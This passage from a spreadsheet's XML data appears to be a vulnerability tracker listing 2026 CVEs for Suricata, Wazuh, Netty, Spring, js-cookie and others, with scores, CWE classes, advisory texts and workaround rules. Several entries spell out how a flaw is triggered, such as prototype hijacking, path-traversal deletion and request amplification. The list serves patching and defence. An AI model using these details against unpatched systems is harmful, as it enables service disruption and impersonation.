      <c r="F2609" s="5" t="inlineStr"/>
      <c r="G2609" s="5" t="inlineStr"/>
      <c r="H2609" s="5" t="inlineStr"/>
      <c r="I2609" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2609" s="5" t="inlineStr"/>
      <c r="K2609" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2609" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, Suricata could repeatedly perform expensive parsing of large HTTP `Content-Disposition` headers during HTTP response body processing. Crafted HTTP traffic could cause excessive CPU usage and denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, use a rule like `alert http1 any any -&gt; any any (sid: 1; http.request_header; content: "Content-Disposition:"; startswith; bsize: &gt; 8192; bypass;)`.</t>
        </is>
      </c>
      <c r="M2609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45759</t>
        </is>
      </c>
    </row>
    <row r="2610">
      <c r="A2610" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45762</t>
        </is>
      </c>
      <c r="C2610" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2610" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2610" s="5" t="inlineStr"/>
      <c r="F2610" s="5" t="inlineStr"/>
      <c r="G2610" s="5" t="inlineStr"/>
      <c r="H2610" s="5" t="inlineStr"/>
      <c r="I2610" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2610" s="5" t="inlineStr"/>
      <c r="K2610" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2610" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, Suricata's IP defragmentation tracker lookup did not verify that an existing tracker used the same IP address family as the packet being processed. Under crafted fragmented IPv4/IPv6 traffic, an IPv6 fragment could be associated with an IPv4 defragmentation tracker. This can lead to a remote packet-triggered crash and denial of service when Suricata performs the relevant defragmentation. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, if using Suricata as an IDS with AF_PACKET, enabling AF_PACKET's `defrag` option may prevent Suricata from seeing such fragmented packets.</t>
        </is>
      </c>
      <c r="M2610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45762</t>
        </is>
      </c>
    </row>
    <row r="2611">
      <c r="A2611" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45765</t>
        </is>
      </c>
      <c r="C2611" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2611" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2611" s="5" t="inlineStr"/>
      <c r="F2611" s="5" t="inlineStr"/>
      <c r="G2611" s="5" t="inlineStr"/>
      <c r="H2611" s="5" t="inlineStr"/>
      <c r="I2611" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2611" s="5" t="inlineStr"/>
      <c r="K2611" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2611" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, DNP3 reassembly could buffer data without sufficient parser-level bounds. Crafted DNP3 traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable DNP3 (which is not enabled by default) if it is not needed, and/or define a limited `stream.reassembly.depth` (0 or absent is unlimited).</t>
        </is>
      </c>
      <c r="M2611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45765</t>
        </is>
      </c>
    </row>
    <row r="2612">
      <c r="A2612" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45766</t>
        </is>
      </c>
      <c r="C2612" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2612" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2612" s="5" t="inlineStr"/>
      <c r="F2612" s="5" t="inlineStr"/>
      <c r="G2612" s="5" t="inlineStr"/>
      <c r="H2612" s="5" t="inlineStr"/>
      <c r="I2612" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2612" s="5" t="inlineStr"/>
      <c r="K2612" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2612" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, certain NFS parser state structures were insufficiently bounded. Crafted NFS traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable NFS application-layer parsing if it is not needed.</t>
        </is>
      </c>
      <c r="M2612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45766</t>
        </is>
      </c>
    </row>
    <row r="2613">
      <c r="A2613" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45768</t>
        </is>
      </c>
      <c r="C2613" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2613" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2613" s="5" t="inlineStr"/>
      <c r="F2613" s="5" t="inlineStr"/>
      <c r="G2613" s="5" t="inlineStr"/>
      <c r="H2613" s="5" t="inlineStr"/>
      <c r="I2613" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2613" s="5" t="inlineStr"/>
      <c r="K2613" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2613" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Starting in version 8.0.0 and prior to version 8.0.5, LDAP transaction state could store an unbounded number of responses. Because LDAP can be processed over UDP, crafted traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Version 8.0.5 contains a fix. As a workaround, disable LDAP application-layer parsing where it is not required. Alternatively, use a rule like `alert ldap any any -&gt; any any (sid: 1; ldap.responses.count: &gt;1024; bypass;)`.</t>
        </is>
      </c>
      <c r="M2613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45768</t>
        </is>
      </c>
    </row>
    <row r="2614">
      <c r="A2614" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45769</t>
        </is>
      </c>
      <c r="C2614" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2614" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2614" s="5" t="inlineStr"/>
      <c r="F2614" s="5" t="inlineStr"/>
      <c r="G2614" s="5" t="inlineStr"/>
      <c r="H2614" s="5" t="inlineStr"/>
      <c r="I2614" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2614" s="5" t="inlineStr"/>
      <c r="K2614" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2614" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5,IKEv2 parser state could grow without bounds while storing client transforms. Repeated crafted UDP traffic may cause Suricata to consume excessive memory, potentially resulting in denial of service. Versions 7.0.16 and 8.0.5 fix the issue. Some workarounds are available. Disable IKE application-layer parsing if it is not needed. Alternatively, use a rule to bypass ike flows after the first packets like `alert ike any any -&gt; any any (sid: 2; flow.pkts_toserver: &gt; 256; bypass; noalert;)`.</t>
        </is>
      </c>
      <c r="M2614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45769</t>
        </is>
      </c>
    </row>
    <row r="2615">
      <c r="A2615" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45770</t>
        </is>
      </c>
      <c r="C2615" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2615" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2615" s="5" t="inlineStr"/>
      <c r="F2615" s="5" t="inlineStr"/>
      <c r="G2615" s="5" t="inlineStr"/>
      <c r="H2615" s="5" t="inlineStr"/>
      <c r="I2615" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2615" s="5" t="inlineStr"/>
      <c r="K2615" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-787</t>
        </is>
      </c>
      <c r="L2615" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Starting in version 8.0.0 and prior to version 8.0.5, a Lua rule that registers too many flow variables can corrupt Lua detection state and may bypass Suricata's restricted Lua sandbox. This requires an affected Lua script/rule to be loaded. Excessive flow variables being registered may also cause Suricata to crash. Version 8.0.5 contains a fix. As a workaround, disable `security.lua.allow-rules` unless Lua rules are required.</t>
        </is>
      </c>
      <c r="M2615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45770</t>
        </is>
      </c>
    </row>
    <row r="2616">
      <c r="A2616" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45798</t>
        </is>
      </c>
      <c r="C2616" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2616" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2616" s="5" t="inlineStr"/>
      <c r="F2616" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2616" s="5" t="inlineStr"/>
      <c r="H2616" s="5" t="inlineStr"/>
      <c r="I2616" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2616" s="5" t="inlineStr"/>
      <c r="K2616" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-170</t>
        </is>
      </c>
      <c r="L2616" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.5.0 until 4.14.6 and 5.0.0-beta2, compare_wazuh_versions() in src/shared/version_op.c copies the attacker-controlled enrollment V: field into a 10-byte stack buffer with strncpy() but does not explicitly terminate the buffer. The function is reachable before authentication through wazuh-authd on TCP port 1515 when anonymous TLS enrollment is enabled. A version string of at least nine non-null bytes can cause strchr() and strtok() to read beyond ver2 and can make strtok() write a null byte into adjacent stack memory, allowing a remote denial of service. This issue is fixed in versions 4.14.6 and 5.0.0-beta2.</t>
        </is>
      </c>
      <c r="M2616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45798</t>
        </is>
      </c>
    </row>
    <row r="2617">
      <c r="A2617" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46340</t>
        </is>
      </c>
      <c r="C2617" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2617" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2617" s="5" t="inlineStr"/>
      <c r="F2617" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2617" s="5" t="inlineStr"/>
      <c r="H2617" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2617" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J2617" s="5" t="inlineStr"/>
      <c r="K2617" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2617" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In versions of netty-transport-sctp prior to 4.1.135.Final and 4.2.15.Final, for each non-complete SctpMessage fragment the handler does `fragments.put(streamId, Unpooled.wrappedBuffer(frag, byteBuf))`, wrapping the previous accumulator and the new slice into a *new* CompositeByteBuf every time. After N fragments the accumulator is an N-deep chain of composites, each holding references and component arrays; readableBytes()/getBytes() on the final buffer recurse N levels. There is no limit on N, on total bytes, or on the number of streamIdentifiers an attacker can open (each gets its own map entry). A peer that never sets the `complete` flag can grow this structure indefinitely from tiny 1-byte DATA chunks. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46340</t>
        </is>
      </c>
    </row>
    <row r="2618">
      <c r="A2618" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46343</t>
        </is>
      </c>
      <c r="C2618" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2618" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2618" s="5" t="inlineStr"/>
      <c r="F2618" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2618" s="5" t="inlineStr"/>
      <c r="H2618" s="5" t="inlineStr"/>
      <c r="I2618" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2618" s="5" t="inlineStr"/>
      <c r="K2618" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2618" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.0.0 until 4.14.6 and 5.0.0-beta2, WazuhCommon.end_receiving_file() in framework/wazuh/core/cluster/common.py allows a cluster-authenticated node to delete files outside WAZUH_PATH. A syn_i_w_m_e request with an unknown task_id reaches the cleanup branch, where an attacker-controlled filename is passed to os.path.join without canonicalization or confinement. Absolute paths and traversal sequences can therefore target files such as ossec.conf, jwt_secret.json, TLS certificates, and ruleset files that are accessible to the Wazuh manager process. Deletion can disable the manager, invalidate API tokens, or disrupt cluster and API connectivity. This issue is fixed in versions 4.14.6 and 5.0.0-beta2.</t>
        </is>
      </c>
      <c r="M2618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46343</t>
        </is>
      </c>
    </row>
    <row r="2619">
      <c r="A2619" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46369</t>
        </is>
      </c>
      <c r="C2619" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2619" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2619" s="5" t="inlineStr"/>
      <c r="F2619" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2619" s="5" t="inlineStr"/>
      <c r="H2619" s="5" t="inlineStr"/>
      <c r="I2619" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J2619" s="5" t="inlineStr"/>
      <c r="K2619" s="5" t="inlineStr">
        <is>
          <t>CWE-193, CWE-294</t>
        </is>
      </c>
      <c r="L2619" s="5" t="inlineStr">
        <is>
          <t>Nimiq is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. Through 1.5.0, the validity store uses a strict lower-bound comparison that expires a stored transaction too early relative to Transaction::is_valid_at, allowing a remote attacker to replay the same signed transaction during a blocks_per_batch minus one block window and cause the sender and recipient balances to be updated twice. This issue is fixed in version 1.5.1.</t>
        </is>
      </c>
      <c r="M2619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46369</t>
        </is>
      </c>
    </row>
    <row r="2620">
      <c r="A2620" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46387</t>
        </is>
      </c>
      <c r="C2620" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2620" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2620" s="5" t="inlineStr"/>
      <c r="F2620" s="5" t="inlineStr"/>
      <c r="G2620" s="5" t="inlineStr"/>
      <c r="H2620" s="5" t="inlineStr"/>
      <c r="I2620" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2620" s="5" t="inlineStr"/>
      <c r="K2620" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L2620" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, Suricata's HTTP/2 decompression path could grow the decompressed response-body buffer without an effective upper bound. A crafted HTTP/2 DATA payload using a high compression ratio, such as gzip, deflate, or brotli compressed data, could cause Suricata to allocate excessive memory while decompressing the payload. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable HTTP2.</t>
        </is>
      </c>
      <c r="M2620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46387</t>
        </is>
      </c>
    </row>
    <row r="2621">
      <c r="A2621" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46579</t>
        </is>
      </c>
      <c r="C2621" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2621" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2621" s="5" t="inlineStr"/>
      <c r="F2621" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2621" s="5" t="inlineStr"/>
      <c r="H2621" s="5" t="inlineStr">
        <is>
          <t>redhat:openshift_container_platform, redhat:openshift_router</t>
        </is>
      </c>
      <c r="I2621" s="5" t="inlineStr">
        <is>
          <t>2026-05-29</t>
        </is>
      </c>
      <c r="J2621" s="5" t="inlineStr"/>
      <c r="K2621" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L2621" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the OpenShift Router. When a Route has `insecureEdgeTerminationPolicy` set to Allow, the HTTP frontend does not remove `X-SSL-Client-*` headers from incoming requests. This allows an unauthenticated attacker to send plain HTTP requests with crafted `X-SSL-Client-*` headers. As a result, backends relying on these headers for mutual TLS (Transport Layer Security) authentication can be bypassed, enabling the attacker to impersonate client certificate identities.</t>
        </is>
      </c>
      <c r="M2621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46579</t>
        </is>
      </c>
    </row>
    <row r="2622">
      <c r="A2622" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46625</t>
        </is>
      </c>
      <c r="C2622" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2622" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2622" s="5" t="inlineStr"/>
      <c r="F2622" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2622" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2622" s="5" t="inlineStr">
        <is>
          <t>js-cookie:javascript_cookie, redhat:3scale_api_management, redhat:ansible_automation_platform, redhat:enterprise_linux, redhat:openshift_ai, redhat:openshift_lightspeed</t>
        </is>
      </c>
      <c r="I2622" s="5" t="inlineStr">
        <is>
          <t>2026-06-10</t>
        </is>
      </c>
      <c r="J2622" s="5" t="inlineStr"/>
      <c r="K2622" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915</t>
        </is>
      </c>
      <c r="L2622" s="5" t="inlineStr">
        <is>
          <t>JavaScript Cookie is a JavaScript API for handling cookies, client-side. Prior to version 3.0.7, js-cookie's internal assign() helper copies properties with for...in + plain assignment. When the source object is produced by JSON.parse, the JSON object's "__proto__" member is an own enumerable property, so the for…in enumerates it and the target[key] = source[key] write triggers the Object.prototype.__proto__ setter on the fresh target ({}). The result is a per-instance prototype hijack: Object.prototype itself is untouched, but the merged attributes object now inherits attacker-controlled keys. Because the consuming set() function then enumerates the merged object with another for...in, every key the attacker placed on the polluted prototype lands in the resulting Set-Cookie string as an attribute pair. The attacker can set domain=, secure=, samesite=, expires=, and path= on cookies whose attributes the developer thought were locked down. This issue has been patched in version 3.0.7.</t>
        </is>
      </c>
      <c r="M2622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46625</t>
        </is>
      </c>
    </row>
    <row r="2623">
      <c r="A2623" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47249</t>
        </is>
      </c>
      <c r="C2623" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2623" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2623" s="5" t="inlineStr"/>
      <c r="F2623" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2623" s="5" t="inlineStr"/>
      <c r="H2623" s="5" t="inlineStr"/>
      <c r="I2623" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2623" s="5" t="inlineStr"/>
      <c r="K2623" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2623" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.18, the P2P resolver request handling logic is vulnerable to hash-array amplification. A connected peer can send a compressed RequestDataType_HashArrayType direct request that is only 442 bytes on the wire but expands into 200,000 decoded hash entries inside the resolver path. The resolver's antiflood logic counts only a single logical message and the compressed wire size, and while Batch.Decompress() caps the decompressed byte size, it never limits the number of decoded repeated-field items. As a result, both TxResolver and TrieNodeResolver preallocate and iterate over the entire unchecked set of decoded hashes, causing remote memory and CPU amplification against any node that accepts P2P peer connections. This issue is fixed in version 1.7.18.</t>
        </is>
      </c>
      <c r="M2623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47249</t>
        </is>
      </c>
    </row>
    <row r="2624">
      <c r="A2624" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47625</t>
        </is>
      </c>
      <c r="C2624" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2624" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2624" s="5" t="inlineStr"/>
      <c r="F2624" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2624" s="5" t="inlineStr"/>
      <c r="H2624" s="5" t="inlineStr"/>
      <c r="I2624" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2624" s="5" t="inlineStr"/>
      <c r="K2624" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2624" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could abuse missing authorization. A successful exploit of this vulnerability might lead to information disclosure, data tampering, and denial of service.</t>
        </is>
      </c>
      <c r="M2624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47625</t>
        </is>
      </c>
    </row>
    <row r="2625">
      <c r="A2625" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47885</t>
        </is>
      </c>
      <c r="C2625" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2625" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2625" s="5" t="inlineStr"/>
      <c r="F2625" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2625" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H2625" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I2625" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2625" s="5" t="inlineStr"/>
      <c r="K2625" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2625" s="5" t="inlineStr">
        <is>
          <t>The PartEventHttpMessageReader in Spring WebFlux does not enforce the maxPartSize limit when maxInMemorySize is set to -1.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28</t>
        </is>
      </c>
      <c r="M2625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47885</t>
        </is>
      </c>
    </row>
    <row r="2626">
      <c r="A2626" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47886</t>
        </is>
      </c>
      <c r="C2626" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2626" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2626" s="5" t="inlineStr"/>
      <c r="F2626" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2626" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H2626" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I2626" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2626" s="5" t="inlineStr"/>
      <c r="K2626" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L2626" s="5" t="inlineStr">
        <is>
          <t>Applications that evaluate user-supplied Spring Expression Language (SpEL) expressions may be vulnerable to a Denial of Service (DoS) attack when the power operator (^) is used with a BigDecimal or BigInteger operand and a large exponent value.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28
Spring Framework 6.0.0 - 6.0.30
Spring Framework 5.3.0 - 5.3.49
Spring Framework 5.2.25.RELEASE and earlier</t>
        </is>
      </c>
      <c r="M2626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47886</t>
        </is>
      </c>
    </row>
    <row r="2627">
      <c r="A2627" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47888</t>
        </is>
      </c>
      <c r="C2627" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2627" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2627" s="5" t="inlineStr"/>
      <c r="F2627" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2627" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H2627" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I2627" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2627" s="5" t="inlineStr"/>
      <c r="K2627" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L2627" s="5" t="inlineStr">
        <is>
          <t>A Spring RSocket application is exposed to a memory leak via a malformed SETUP frame.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28
Spring Framework 6.0.0 - 6.0.30
Spring Framework 5.3.0 - 5.3.49
Spring Framework 5.2.0.RELEASE - 5.2.25.RELEASE</t>
        </is>
      </c>
      <c r="M2627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47888</t>
        </is>
      </c>
    </row>
    <row r="2628">
      <c r="A2628" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47889</t>
        </is>
      </c>
      <c r="C2628" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2628" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
